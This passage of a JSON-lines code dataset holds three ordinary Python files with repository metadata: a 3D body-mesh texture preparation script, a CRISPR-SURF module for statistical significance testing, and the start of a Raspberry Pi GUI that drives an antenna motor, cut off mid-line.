{"api_name": "socket.socket", "line_number": 26, "usage_type": "call"}, {"api_name": "socket.SOCK_RAW", "line_number": 26, "usage_type": "argument"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 34, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 34, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.getuid", "line_number": 55, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 56, "usage_type": "call"}, {"api_name": "socket.AF_INET6", "line_number": 56, "usage_type": "argument"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 56, "usage_type": "argument"}, {"api_name": "socket.socket", "line_number": 59, "usage_type": "call"}, {"api_name": "socket.SOCK_RAW", "line_number": 59, "usage_type": "argument"}, {"api_name": "socket.IPPROTO_ESP", "line_number": 59, "usage_type": "argument"}, {"api_name": "threading.Thread", "line_number": 68, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 78, "usage_type": "call"}]}
+{"seq_id": "17805434187", "text": "import torch\nimport numpy as np\nfrom dataset.dataset import getDatasetAndLoader\nfrom model import getOptNet\nfrom pyhocon import ConfigFactory,HOCONConverter\nimport argparse\nimport trimesh\nimport openmesh as om\nimport os\nimport os.path as osp\nfrom MCAcc import Seg3dLossless\nimport utils\nimport cv2\nfrom tqdm import tqdm\nfrom pytorch3d.renderer import (\n\tRasterizationSettings, \n\tMeshRasterizer,\n\tSoftSilhouetteShader,\n\tHardPhongShader,\n\tBlendParams,\n\tPointsRasterizationSettings,\n\tPointsRenderer,\n\tPointsRasterizer,\n\tAlphaCompositor\n)\nfrom pytorch3d.renderer.mesh.renderer import MeshRendererWithFragments\nfrom pytorch3d.io import load_obj\nimport scipy\nfrom scipy.spatial.transform import Rotation\n\nparser = argparse.ArgumentParser(description='neu video body infer')\nparser.add_argument('--gpu-ids',nargs='+',type=int,metavar='IDs',\n\t\t\t\t\thelp='gpu ids')\nparser.add_argument('--num',default=120,type=int,metavar='IDs',\n\t\t\t\t\thelp='Number of used frames')\n# parser.add_argument('--conf',default=None,metavar='M',\n# help='config file')\nparser.add_argument('--rec-root',default=None,metavar='M',\n\t\t\t\t\thelp='data root')\nargs = parser.parse_args()\nroot=osp.normpath(args.rec_root)\nassert(osp.isfile(osp.join(args.rec_root,'template','uvmap.obj')))\n\nconfig=ConfigFactory.parse_file(osp.join(root,'config.conf'))\ndevice=args.gpu_ids[0]\ndeformer_condlen=config.get_int('mlp_deformer.condlen')\nrenderer_condlen=config.get_int('render_net.condlen')\n# batch_size=config.get_int('train.coarse.batch_size')\nbatch_size=1\nshuffle=False\ndataset,dataloader=getDatasetAndLoader(osp.normpath(osp.join(root,osp.pardir)),{'deformer':deformer_condlen,'renderer':renderer_condlen},batch_size,\n\t\t\t\t\t\tshuffle,config.get_int('train.num_workers'),\n\t\t\t\t\t\tFalse,False,False)\n\nresolutions = [\n (10+1, 14+1, 6+1),\n (20+1, 28+1, 12+1),\n (40+1, 56+1, 24+1),\n (80+1, 112+1, 48+1),\n (160+1, 224+1, 96+1),\n]\n\noptNet,sdf_initialized=getOptNet(dataset,batch_size,None,None,resolutions,device,config)\n\nprint('load model: '+osp.join(root,'latest.pth'))\noptNet,dataset=utils.load_model(osp.join(root,'latest.pth'),optNet,dataset,device)\noptNet.dataset=dataset\noptNet.eval()\n\n\nratio={'sdfRatio':1.,'deformerRatio':1.,'renderRatio':1.}\n\ntmpMesh=load_obj(osp.join(args.rec_root,'template','uvmap.obj'))\n\nTmpVs=tmpMesh[0].to(device)\nTmpfs=tmpMesh[1].verts_idx.to(device)\n\nTmpTexCoords=tmpMesh[2].verts_uvs.numpy()\nTmpTexfs=tmpMesh[1].textures_idx.numpy()\n\nindices_texture = np.ceil(np.arange(args.num) * dataset.frame_num * 1. / args.num).astype(np.int)\n# indices_texture = np.ceil(np.arange(args.num) * 260 * 1. / args.num).astype(np.int)\n\ndefVs=[]\n\nwith torch.no_grad():\n\tfor fid in indices_texture:\n\t\tfid=torch.tensor([fid])\n\t\tposes,trans,d_cond,rendcond=optNet.dataset.get_grad_parameters(fid,device)\n\t\tdefTmpVs=optNet.deformer(TmpVs[None,:,:],[d_cond,[poses,trans]],ratio=ratio)\n\t\tdefVs.append(defTmpVs.cpu().numpy().reshape(-1,3))\n\t# poses,trans,d_cond,rendcond=optNet.dataset.get_grad_parameters(0,device)\n\t# inter_results={}\n\t# optNet.deformer.defs[1](TmpVs.unsqueeze(0),[poses.unsqueeze(0),trans.unsqueeze(0)],inter_results=inter_results)\ndefVs=np.stack(defVs)\n\ncam_data={}\ncam_data['cam_c']=dataset.camera_params['princeple_points'].cpu().view(2).numpy()\ncam_data['cam_f']=dataset.camera_params['focal_length'].cpu().view(2).numpy()\ncam_data['cam_k']=np.zeros(5)\ncam_t=dataset.camera_params['world2cam_coord_trans'].cpu().view(3).numpy()\ncam_t[0]=-cam_t[0]\ncam_t[1]=-cam_t[1]\ncam_data['cam_t']=cam_t\ncam_rt=dataset.camera_params['cam2world_coord_quat'].cpu().view(4)[[1,2,3,0]].numpy()\ncam_rt/=np.linalg.norm(cam_rt)\ncam_rt=Rotation.from_quat(cam_rt).as_matrix().T\ncam_rt[0,:]=-cam_rt[0,:]\ncam_rt[1,:]=-cam_rt[1,:]\ncam_rt=Rotation.from_matrix(cam_rt).as_rotvec()\ncam_data['cam_rt']=cam_rt\n\nnp.savez(osp.join(args.rec_root,'template','tex_predata.npz'),vt=TmpTexCoords,ft=TmpTexfs,tmpvs=TmpVs.cpu().numpy(),fs=Tmpfs.cpu().numpy(),defVs=defVs,fids=indices_texture,**cam_data)\n# np.savez(osp.join(args.rec_root,'template','data.npz'),skin_ws=inter_results['weights'].cpu().numpy(),shape=dataset.shape.cpu().numpy(),pose=utils.smpl_tmp_Apose(config.get_int('train.skinner_pose_type') if 'train.skinner_pose_type' in config else 0))\n\nprint('done')", "repo_name": "jby1993/SelfReconCode", "sub_path": "texture_mesh_prepare.py", "file_name": "texture_mesh_prepare.py", "file_ext": "py", "file_size_in_byte": 4229, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 381, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "pyhocon.ConfigFactory.parse_file", "line_number": 44, "usage_type": "call"}, {"api_name": "pyhocon.ConfigFactory", "line_number": 44, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "name"}, {"api_name": "dataset.dataset", "line_number": 51, "usage_type": "name"}, {"api_name": "dataset.dataset.getDatasetAndLoader", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.pardir", "line_number": 51, "usage_type": "attribute"}, {"api_name": "model.getOptNet", "line_number": 63, "usage_type": "call"}, {"api_name": "dataset.dataset", "line_number": 63, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "name"}, {"api_name": "dataset.dataset", "line_number": 66, "usage_type": "name"}, {"api_name": "utils.load_model", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "name"}, {"api_name": "dataset.dataset", "line_number": 67, "usage_type": "name"}, {"api_name": "pytorch3d.io.load_obj", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "name"}, {"api_name": "numpy.ceil", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 81, "usage_type": "call"}, {"api_name": "dataset.dataset.frame_num", "line_number": 81, "usage_type": "attribute"}, {"api_name": "dataset.dataset", "line_number": 81, "usage_type": "name"}, {"api_name": "numpy.int", "line_number": 81, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 95, "usage_type": "call"}, {"api_name": "dataset.dataset.camera_params", "line_number": 98, "usage_type": "attribute"}, {"api_name": "dataset.dataset", "line_number": 98, "usage_type": "name"}, {"api_name": "dataset.dataset.camera_params", "line_number": 99, "usage_type": "attribute"}, {"api_name": "dataset.dataset", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 100, "usage_type": "call"}, {"api_name": "dataset.dataset.camera_params", "line_number": 101, "usage_type": "attribute"}, {"api_name": "dataset.dataset", "line_number": 101, "usage_type": "name"}, {"api_name": "dataset.dataset.camera_params", "line_number": 105, "usage_type": "attribute"}, {"api_name": "dataset.dataset", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 106, "usage_type": "attribute"}, {"api_name": "scipy.spatial.transform.Rotation.from_quat", "line_number": 107, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 107, "usage_type": "name"}, {"api_name": "scipy.spatial.transform.Rotation.from_matrix", "line_number": 110, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.savez", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "name"}]}
+{"seq_id": "36949026249", "text": "#!/usr/bin/env python\npymin = min\npyabs = abs\n# from cvxpy import *\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import norm\nfrom scipy.stats import laplace\nimport random\nimport logging\nimport multiprocessing as mp\nfrom statsmodels.sandbox.stats.multicomp import multipletests\n\nfrom CRISPR_SURF_Deconvolution import crispr_surf_deconvolution_simulations, crispr_surf_statistical_power\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\ndef crispr_surf_deconvolved_signal(gammas2betas, gamma_chosen, averaging_method, out_dir):\n\n\t\"\"\"\n\tFunction to construct final deconvolved signal based on chosen gamma.\n\tThe gammas2betas dictionary has structure: Keys: 1) Replicate, 2) Gamma\n\tAveraging method can be mean or median to combine all biological replicates.\n\t\"\"\"\n\n\t# Create combined deconvolved signals from replicates\n\tdeconvolved_signal = {}\n\tfor i in [x for x in gammas2betas.keys() if ((x != 'combined') and (x != 'gamma_chosen') and (x != 'padj') and (x != 'indices') and (x != 'chr') and (x != 'p'))]:\n\n\t\tfor j in range(len(gammas2betas[i][gamma_chosen])):\n\n\t\t\tif j not in deconvolved_signal:\n\t\t\t\tdeconvolved_signal[j] = []\n\n\t\t\tdeconvolved_signal[j].append(gammas2betas[i][gamma_chosen][j])\n\n\t# Create mean or median profile\n\tif averaging_method == 'mean':\n\t\tgammas2betas['combined'] = [np.mean(deconvolved_signal[x]) for x in deconvolved_signal]\n\n\telif averaging_method == 'median':\n\t\tgammas2betas['combined'] = [np.median(deconvolved_signal[x]) for x in deconvolved_signal]\n\n\tgammas2betas['gamma_chosen'] = gamma_chosen\n\tgammas2betas['indices'] = gammas2betas[1]['indices']\n\tgammas2betas['chr'] = gammas2betas[1]['chr']\n\n\tchrom = gammas2betas['chr']\n\tindices = gammas2betas['indices']\n\tbetas = gammas2betas['combined']\n\n\t# df = pd.DataFrame({\n\t# \t'Chr': chrom,\n\t# \t'Index': indices,\n\t# \t'Beta': betas\n\t# \t})\n\n\t# df.to_csv(path_or_buf = (out_dir + '/beta_profile.bedgraph'), index = False, header = False, columns = ['Chr','Index','Index','Beta'], sep = '\\t')\n\n\treturn gammas2betas\n\ndef crispr_surf_statistical_significance(sgRNA_summary_table, sgRNA_indices, perturbation_profile, gammas2betas, null_distribution, simulation_n, test_type, guideindices2bin, averaging_method, padj_cutoffs, effect_size, limit, scale, estimate_statistical_power):\n\n\t\"\"\"\n\tFunction to assess the statistical significance of deconvolved genomic signal.\n\tCalculates empirical p-values for each beta, then performs FDR correction through the Benjamini-Hochberg procedure for p.adj.-values.\n\t\"\"\"\n\n\t# Load sgRNA summary table\n\tdf_summary_table = pd.read_csv(sgRNA_summary_table)\n\treplicates = len([x for x in df_summary_table.columns.tolist() if 'Log2FC_Replicate' in x])\n\n\t# Gamma chosen for downstream analysis\n\tgamma_chosen = gammas2betas['gamma_chosen']\n\n\t# Load estimated betas into dictionary\n\tbeta_distributions = {}\n\tfor i in range(len(gammas2betas['combined'])):\n\n\t\tbeta_distributions[i] = gammas2betas['combined'][i]\n\n\t# Decide how to draw from null distribution and perform deconvolution on simulated null arrays\n\tlogger.info('Performing %s simulations to construct beta null distributions ...' % (simulation_n))\n\n\tif null_distribution == 'negative_control':\n\t\tif 'negative_control' not in df_summary_table['sgRNA_Type'].unique().tolist():\n\t\t\tnull_distribution = 'gaussian'\n\n\treplicate_parameters = []\n\tif null_distribution == 'negative_control':\n\n\t\treplicate_parameters.append('NA')\n\n\t\t# Grab all negative control sgRNA lfc scores\n\t\tnegative_control_guide_scores = []\n\t\tfor i in range(1, int(replicates) + 1):\n\t\t\tnegative_control_guide_scores.append(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] == 'negative_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\n\t\t# Construct many simulated null arrays to perform deconvolution\n\t\tbeta_distributions_null = crispr_surf_deconvolution_simulations(negative_control_scores = ['negative_control_guides', negative_control_guide_scores], sgRNA_indices = sgRNA_indices, perturbation_profile = perturbation_profile, gamma_list = [gamma_chosen], simulations_n = simulation_n, replicates = replicates, guideindices2bin = guideindices2bin, averaging_method = averaging_method, scale = scale)\n\n\telif null_distribution == 'laplace':\n\n\t\t# Parameterize observed signal with laplace distribution (assume majority of observation sgRNAs are null)\n\t\tfor i in range(1, int(replicates) + 1):\n\n\t\t\t# # Remove distribution skew\n\t\t\t# sorted_nc = sorted(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] != 'positive_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\t\t\t# median_val = np.median(sorted_nc)\n\t\t\t# left_tail_median = np.median(sorted_nc[:int(0.1*len(sorted_nc))])\n\t\t\t# right_tail_median = np.median(sorted_nc[-int(0.1*len(sorted_nc)):])\n\n\t\t\t# # Left skewed\n\t\t\t# if (median_val - left_tail_median) > (right_tail_median - median_val):\n\t\t\t# \thalf_dist = [x for x in sorted_nc if x >= median_val]\n\n\t\t\t# # Right skewed\n\t\t\t# else:\n\t\t\t# \thalf_dist = [x for x in sorted_nc if x <= median_val]\n\t\t\t\n\t\t\t# half_dist_mirrored = [(2*median_val - x) for x in half_dist]\n\t\t\t# total_dist = half_dist + half_dist_mirrored\n\t\t\t# replicate_parameters.append(laplace.fit(total_dist))\n\n\t\t\t# Parameterize distribution directly\n\t\t\tobservation_median = np.median(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] != 'positive_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\t\t\tlaplace_loc, laplace_scale = laplace.fit(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] != 'positive_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\t\t\treplicate_parameters.append([observation_median, laplace_scale])\n\n\t\t# Construct many simulated null arrays to perform deconvolution\n\t\tbeta_distributions_null = crispr_surf_deconvolution_simulations(negative_control_scores = ['laplace', replicate_parameters], sgRNA_indices = sgRNA_indices, perturbation_profile = perturbation_profile, gamma_list = [gamma_chosen], simulations_n = simulation_n, replicates = replicates, guideindices2bin = guideindices2bin, averaging_method = averaging_method, scale = scale)\n\n\telif null_distribution == 'gaussian':\n\n\t\t# Parameterize observed signal with gaussian distribution (assume majority of observation sgRNAs are null)\n\t\tfor i in range(1, int(replicates) + 1):\n\n\t\t\t# # Remove distribution skew\n\t\t\t# sorted_nc = sorted(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] != 'positive_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\t\t\t# median_val = np.median(sorted_nc)\n\t\t\t# left_tail_median = np.median(sorted_nc[:int(0.1*len(sorted_nc))])\n\t\t\t# right_tail_median = np.median(sorted_nc[-int(0.1*len(sorted_nc)):])\n\n\t\t\t# # Left skewed\n\t\t\t# if (median_val - left_tail_median) > (right_tail_median - median_val):\n\t\t\t# \thalf_dist = [x for x in sorted_nc if x >= median_val]\n\n\t\t\t# # Right skewed\n\t\t\t# else:\n\t\t\t# \thalf_dist = [x for x in sorted_nc if x <= median_val]\n\t\t\t\n\t\t\t# half_dist_mirrored = [(2*median_val - x) for x in half_dist]\n\t\t\t# total_dist = half_dist + half_dist_mirrored\n\t\t\t# replicate_parameters.append(norm.fit(total_dist))\n\n\t\t\t# Parameterize distribution directly\n\t\t\tobservation_median = np.median(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] != 'positive_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\t\t\tgaussian_loc, gaussian_scale = norm.fit(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] != 'positive_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\t\t\treplicate_parameters.append([observation_median, gaussian_scale])\n\n\t\t# Construct many simulated null arrays to perform deconvolution\n\t\tbeta_distributions_null = crispr_surf_deconvolution_simulations(negative_control_scores = ['gaussian', replicate_parameters], sgRNA_indices = sgRNA_indices, perturbation_profile = perturbation_profile, gamma_list = [gamma_chosen], simulations_n = simulation_n, replicates = replicates, guideindices2bin = guideindices2bin, averaging_method = averaging_method, scale = scale)\n\n\t# Calculate p-values\n\tlogger.info('Calculating p. values for %s betas ...' % (len(beta_distributions)))\n\n\tbeta_pvals = []\n\tif test_type == 'nonparametric':\n\n\t\tfor i in range(len(beta_distributions)):\n\n\t\t\tif (i + 1)%500 == 0:\n\t\t\t\tlogger.info('Calculated p. values for %s out of %s betas ...' % ((i + 1), len(beta_distributions)))\n\n\t\t\testimated_beta = beta_distributions[i]\n\t\t\t# null_betas = beta_distributions_null[i]\n\t\t\t# beta_pvals.append(2.0*float(max(0.0, min(sum(x >= estimated_beta for x in null_betas), sum(x <= estimated_beta for x in null_betas))))/float(len(null_betas)))\n\n\t\t\tnull_betas = np.array(beta_distributions_null[i])\n\t\t\tbeta_pvals.append(2.0 * min((null_betas >= estimated_beta).sum(), (null_betas <= estimated_beta).sum()) / float(len(null_betas)))\n\n\telif test_type == 'parametric':\n\n\t\tfor i in range(len(beta_distributions)):\n\n\t\t\tif (i + 1)%500 == 0:\n\t\t\t\tlogger.info('Calculated p. values for %s out of %s betas ...' % ((i + 1), len(beta_distributions)))\n\n\t\t\testimated_beta = beta_distributions[i]\n\t\t\tnull_betas_loc, null_betas_scale = norm.fit(beta_distributions_null[i])\n\t\t\t\n\t\t\tbeta_pvals.append(2.0*float(max(0.0, min([norm(loc = null_betas_loc, scale = null_betas_scale).sf(estimated_beta), 1.0 - norm(loc = null_betas_loc, scale = null_betas_scale).sf(estimated_beta)]))))\n\n\tlogger.info('Calculated p. values for %s out of %s betas ...' % (len(beta_distributions), len(beta_distributions)))\n\n\tbeta_pvals_adj = multipletests(pvals = beta_pvals, alpha = 0.05, method = 'fdr_bh')[1]\n\tgammas2betas['p'] = beta_pvals\n\tgammas2betas['padj'] = beta_pvals_adj\n\n\tnew_p_cutoff = beta_pvals[pymin(range(len(beta_pvals_adj)), key=lambda i: pyabs(beta_pvals_adj[i] - float(padj_cutoffs[0])))]\n\t\n\t# Estimate statistical power\n\tif estimate_statistical_power == 'yes':\n\t\tbeta_statistical_power = []\n\t\tif scale > 1:\n\t\t\tbeta_corrected_effect_size = crispr_surf_statistical_power(sgRNA_indices = guideindices2bin.keys(), gammas2betas = gammas2betas, effect_size = effect_size, gamma_chosen = gamma_chosen, perturbation_profile = perturbation_profile, scale = scale)\n\n\t\telse:\n\t\t\tbeta_corrected_effect_size = crispr_surf_statistical_power(sgRNA_indices = sgRNA_indices, gammas2betas = gammas2betas, effect_size = effect_size, gamma_chosen = gamma_chosen, perturbation_profile = perturbation_profile, scale = scale)\n\n\t\tfor i in range(len(beta_corrected_effect_size)):\n\n\t\t\t# shifted_distribution = [x + beta_corrected_effect_size[i] for x in beta_distributions_null[i]]\n\t\t\t# percentile_cutoff = np.percentile(beta_distributions_null[i], (100.0 - float(new_p_cutoff)*100.0/2.0))\n\n\t\t\tbeta_dist_null = np.array(beta_distributions_null[i])\n\t\t\tshifted_distribution = beta_dist_null + beta_corrected_effect_size[i]\n\t\t\tpercentile_cutoff = np.percentile(beta_dist_null, (100.0 - float(new_p_cutoff)*100.0/2.0))\n\n\t\t\tif (i + 1)%500 == 0:\n\t\t\t\tlogger.info('Calculated statistical power for %s out of %s betas ...' % ((i + 1), len(beta_distributions)))\n\n\t\t\t# beta_statistical_power.append(float(sum(x >= percentile_cutoff for x in shifted_distribution))/float(len(shifted_distribution)))\n\n\t\t\tbeta_statistical_power.append((shifted_distribution > percentile_cutoff).sum() / float(len(shifted_distribution)))\n\n\t\tgammas2betas['power'] = beta_statistical_power\n\n\treturn gammas2betas, replicate_parameters", "repo_name": "pinellolab/CRISPR-SURF", "sub_path": "SURF/command_line/CRISPR_SURF_Statistical_Significance.py", "file_name": "CRISPR_SURF_Statistical_Significance.py", "file_ext": "py", "file_size_in_byte": 11265, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "CRISPR_SURF_Deconvolution.crispr_surf_deconvolution_simulations", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 127, "usage_type": "call"}, {"api_name": "scipy.stats.laplace.fit", "line_number": 128, "usage_type": "call"}, {"api_name": "scipy.stats.laplace", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 128, "usage_type": "call"}, {"api_name": "CRISPR_SURF_Deconvolution.crispr_surf_deconvolution_simulations", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 158, "usage_type": "call"}, {"api_name": "scipy.stats.norm.fit", "line_number": 159, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 159, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 159, "usage_type": "call"}, {"api_name": "CRISPR_SURF_Deconvolution.crispr_surf_deconvolution_simulations", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "scipy.stats.norm.fit", "line_number": 191, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 191, "usage_type": "name"}, {"api_name": "scipy.stats.norm", "line_number": 193, "usage_type": "call"}, {"api_name": "statsmodels.sandbox.stats.multicomp.multipletests", "line_number": 197, "usage_type": "call"}, {"api_name": "CRISPR_SURF_Deconvolution.crispr_surf_statistical_power", "line_number": 207, "usage_type": "call"}, {"api_name": "CRISPR_SURF_Deconvolution.crispr_surf_statistical_power", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 219, "usage_type": "call"}]}
+{"seq_id": "1587139047", "text": "#! /usr/bin/python3\n##################################################################\n#\n# Raspberry Pi Antenna Driver (RPiAntDrv.py)\n#\n# Python GUI script to control H-Bridge via RPi.\n# H-Bridge drives single DC motor tuned antenna.\n#\n# Name Call Date(s)\n# Authors: Bill Peterson N7IFC Mar-May2020\n#\n##################################################################\n\nfrom tkinter import Tk, ttk, messagebox, Frame, Menu, Label, Button\nfrom tkinter import Scale, IntVar, StringVar, Toplevel\nfrom tkinter import RAISED, HORIZONTAL, LEFT, S, W, SW, NW\nfrom pathlib import Path\nimport configparser\nimport RPi.GPIO as GPIO\n\nclass Window(Frame):\n # Define settings upon initialization\n def __init__(self, master=None):\n \n # parameters to send through the Frame class. \n Frame.__init__(self, master) \n \n #reference to the master widget, which is the tk window \n self.master = master\n \n # Retrieve parent script directory for absolute addressing\n self.base_path = Path(__file__).parent\n self.ini_path = str(self.base_path)+'/RPiAntDrv.ini'\n #print (self.ini_path)\n \n # Raspberry Pi I/O pins get reassigned when ini file is read\n self.pwm_freq = 4000 # PWM Freq in Hz\n self.pwm_duty = 0 # PWM Duty in percent, default to 0%\n self.stall_time = 250 # Motor stall time in mS\n \n self.encoder_count = IntVar() # Antenna reed switch count\n self.encoder_count.set(0)\n self.motor_running = False # Motor running flag\n self.motor_stalled = False # Motor stalled flag\n self.stall_active = False # Stall detection active\n self.stall_count = 0 # Encoder count during stall detection\n self.full_speed = 100 # Full speed PWM duty cycle\n self.slow_speed = 25 # Slow speed PWM duty cycle\n self.antenna_raising = False # Motor direction flag\n self.ant_config_sect = (\"null\") # Active ini file config section\n self.ant_preset_sect = (\"null\") # Active ini file preset section\n self.ant_preset_val = 0 # Preset encoder target value from ini presets\n self.status_message = StringVar() # Status message text for text_2\n \n # Run init_window, which doesn't yet exist\n self.init_window()\n \n #Creation of init_window\n def init_window(self):\n self.master.title('RPi Antenna Driver (v1.6)')\n # Set up root window & size (width x height + x_offset + y_offset)\n self.bg_color = 'azure'\n self.master.geometry(\"350x275+150+100\")\n self.master.configure(bg= self.bg_color)\n \n # Create menu entry and sub-options\n menubar = Menu(self.master)\n self.master.config(menu=menubar) \n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Open\", command=self.about)\n filemenu.add_command(label=\"Save\", command=self.about)\n filemenu.add_command(label=\"Save as...\", command=self.about)\n filemenu.add_separator()\n filemenu.add_command(label=\"Quit\", command=self.close)\n menubar.add_cascade(label=\"File\", menu=filemenu)\n \n editmenu = Menu(menubar, tearoff=0)\n editmenu.add_command(label=\"Default ini\", command=self.confirm_newini)\n editmenu.add_command(label=\"Sync Count\", command=self.confirm_sync)\n editmenu.add_command(label=\"Undefined 2\", command=self.about)\n menubar.add_cascade(label=\"Edit\", menu=editmenu)\n \n helpmenu = Menu(menubar, tearoff=0)\n helpmenu.add_command(label=\"About\", command=self.about)\n menubar.add_cascade(label=\"Help\", menu=helpmenu)\n \n text_1 = Label(textvariable=self.encoder_count, font = ('Helvetica', 30),\n bg = self.bg_color, fg='black', pady=5, height=1)\n text_1.grid(row=0, column=0, rowspan=2, pady=1, sticky=S)\n \n text_2 = Label(text='Status:', font = ('Helvetica', 14),\n bg = self.bg_color, fg='black', height=1,\n anchor=SW, width=22, justify=LEFT)\n text_2.grid(row=0, column=1, columnspan=1, sticky=SW)\n \n text_3 = Label(textvariable=self.status_message, font = ('Helvetica', 12),\n bg='white', fg='black', height=1, anchor=NW, width=22,\n borderwidth=1, relief=\"solid\")\n text_3.grid(row=1, column=1, sticky=NW)\n \n text_4 = Label(text='Motor Speed (%):', font = ('Helvetica', 14),\n bg = self.bg_color, fg='black', padx=1, height=1,\n anchor=SW, width=22, justify=LEFT)\n text_4.grid(row=2, column=1, columnspan=1, sticky=S)\n \n text_5 = Label(text='Antenna Selection:', font = ('Helvetica', 14),\n bg = self.bg_color, fg='black', padx=1, height=1,\n anchor=SW, width=22, justify=LEFT)\n text_5.grid(row=4, column=1, columnspan=1, sticky=S)\n \n text_6 = Label(text='Preset Selection:', font = ('Helvetica', 14),\n bg = self.bg_color, fg='black', padx=1, height=1,\n anchor=W, width=22, justify=LEFT)\n text_6.grid(row=6, column=1, columnspan=1, sticky=S)\n \n self.raise_button = Button(text='Raise', relief=RAISED, bd=4, padx=1,\n pady=1, height=2, width=6, font=('Helvetica', 14))\n self.raise_button.grid(row=2, column=0, padx=20, pady=5, rowspan=2)\n self.raise_button.bind(\"\", self.raise_button_press)\n self.raise_button.bind(\"\", self.RL_button_release)\n \n self.lower_button = Button(text='Lower', relief=RAISED, bd=4, padx=1,\n pady=1, height=2, width=6, font=('Helvetica', 14))\n self.lower_button.grid(row=4, column=0, padx=20, pady=5, rowspan=2)\n self.lower_button.bind(\"\", self.lower_button_press)\n self.lower_button.bind(\"\", self.RL_button_release)\n \n self.preset_button = Button(text='Preset', relief=RAISED, bd=4, padx=1,\n pady=1, height=2, width=6, font=('Helvetica', 14))\n self.preset_button.grid(row=6, column=0, padx=5, pady=5, rowspan=2)\n self.preset_button.bind(\"\", self.preset_button_press)\n \n self.duty_scale = Scale(from_=1, to=100, orient = HORIZONTAL,\n resolution = 1, length=200,\n command = self.update_pwm_duty)\n self.duty_scale.grid(row=3,column=1, sticky=NW)\n \n # Antenna preset combo box is populated with values from ini file\n self.antenna_combobox = ttk.Combobox(width=19, font=('Helvetica', 14),\n state='readonly')\n self.antenna_combobox.grid(row=5, column=1, sticky=NW)\n self.antenna_combobox.bind(\"<>\", self.get_antenna_val)\n \n # Antenna preset combo box is populated with values from ini file\n self.preset_combobox = 